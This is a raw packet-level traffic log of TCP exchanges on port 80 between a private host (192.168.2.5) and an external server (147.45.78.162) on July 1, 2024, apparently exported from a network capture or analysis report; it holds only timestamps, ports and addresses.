Jul 1, 2024 13:02:12.002562046 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.002580881 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.002590895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.002629995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.002971888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.003030062 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.003093004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.003104925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.003144026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.003371954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.003393888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.003423929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.003432989 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.007884979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.007953882 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.008022070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.008033991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.008140087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.008153915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.008184910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.008184910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.008202076 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.008208036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.008357048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.008369923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.008382082 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.008397102 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.008430958 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.017539024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.017565966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.017579079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.017605066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.017625093 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.017890930 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.017904043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.017916918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.017929077 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.017936945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.017959118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.017986059 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.021465063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.021576881 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.021586895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.021600008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.021632910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.021760941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.021773100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.021785021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.021797895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.021806002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.021822929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.021851063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.022255898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.022298098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.025408983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.025465965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.025558949 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.025569916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.025599957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.025613070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.025731087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.025743008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.025770903 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.025783062 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.025902987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.025914907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.025943995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.025962114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.030774117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.030831099 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.030880928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.030893087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.030925035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.031182051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.031193972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.031207085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.031219006 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.031224966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.031251907 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.031279087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.034504890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.034563065 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.034594059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.034605026 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.034627914 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.034648895 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.034862995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.034874916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.034903049 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.034914017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.035114050 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.035125971 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.035152912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.035161972 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.037928104 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.037940025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.037950039 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.037983894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.038017988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.038177013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.038188934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.038224936 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.038369894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.038381100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.038407087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.038427114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.039978027 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.040014029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.040020943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.040047884 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.040060043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.040100098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.040230989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.040242910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.040270090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.040287971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.040437937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.040448904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.040458918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.040474892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.040489912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.040503025 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.053848028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.053863049 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.053874969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.053953886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.054131031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.054141998 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.054153919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.054181099 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.054219007 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.054610014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.054620981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.054631948 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.054644108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.054651976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.054662943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.054676056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.054685116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.054708004 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.055470943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.055480957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.055493116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.055502892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.055510044 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.055520058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.055531979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.055541039 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.055550098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.055577993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.055589914 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.056400061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.056416035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.056427002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.056437969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.056451082 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.056456089 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.056464911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.056474924 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.056504965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.057238102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.057251930 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.057282925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.057310104 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.067265034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.067307949 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.067318916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.067398071 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.067426920 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.067550898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.067588091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.067719936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.067728996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.067740917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.067751884 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.067759037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.067779064 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.067802906 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.068290949 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.068301916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.068312883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.068324089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.068335056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.068342924 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.068351984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.068387032 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.091063023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.091218948 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.091232061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.091248035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.091264963 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.091284037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.091315031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.091344118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.091448069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.091460943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.091473103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.091480017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.091487885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.091495991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.091514111 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.091527939 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.097098112 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.097136021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.097157001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.097177029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.097188950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.097219944 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.097381115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.097393036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.097404003 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.097414017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.097434998 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.097769022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.097779989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.097804070 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.097829103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.102602959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.102650881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.102754116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.102765083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.102788925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.102811098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.103045940 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.103055954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.103070974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.103081942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.103097916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.103131056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.114458084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.114526987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.114550114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.114561081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.114586115 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.114603996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.114813089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.114825010 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.114852905 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.114864111 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.115091085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.115103006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.115133047 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.115144968 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.115976095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.116020918 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.116086960 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.116096973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.116130114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.116290092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.116302013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.116312981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.116327047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.116333008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.116358042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.116380930 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.116770983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.116812944 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.119993925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.120037079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.120049953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.120064974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.120083094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.120099068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.120273113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.120290995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.120311975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.120325089 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.120456934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.120467901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.120496035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.120510101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.125235081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.125310898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.125344038 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.125356913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.125387907 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.125400066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.125579119 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.125617981 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.125715971 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.125726938 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.125739098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.125749111 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.125758886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.125776052 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.125792980 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.129079103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.129136086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.129208088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.129220009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.129249096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.129266977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.129415035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.129450083 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.129458904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.129472017 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.129493952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.129512072 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.129812002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.129821062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.129853964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.132344007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.132368088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.132395029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.132410049 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.132419109 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.132452965 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.343075037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.348553896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.543405056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.543450117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.543461084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.543472052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.543488026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.543508053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.543523073 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.543570042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.543756008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.543767929 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.543778896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.543802977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.543823957 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.544092894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.544104099 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.544116020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.544127941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.544136047 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.544181108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.565762997 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.565823078 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:12.565994978 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.566006899 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:12.566018105 CEST	80	49705	147.45.78.162	192.168.2.5
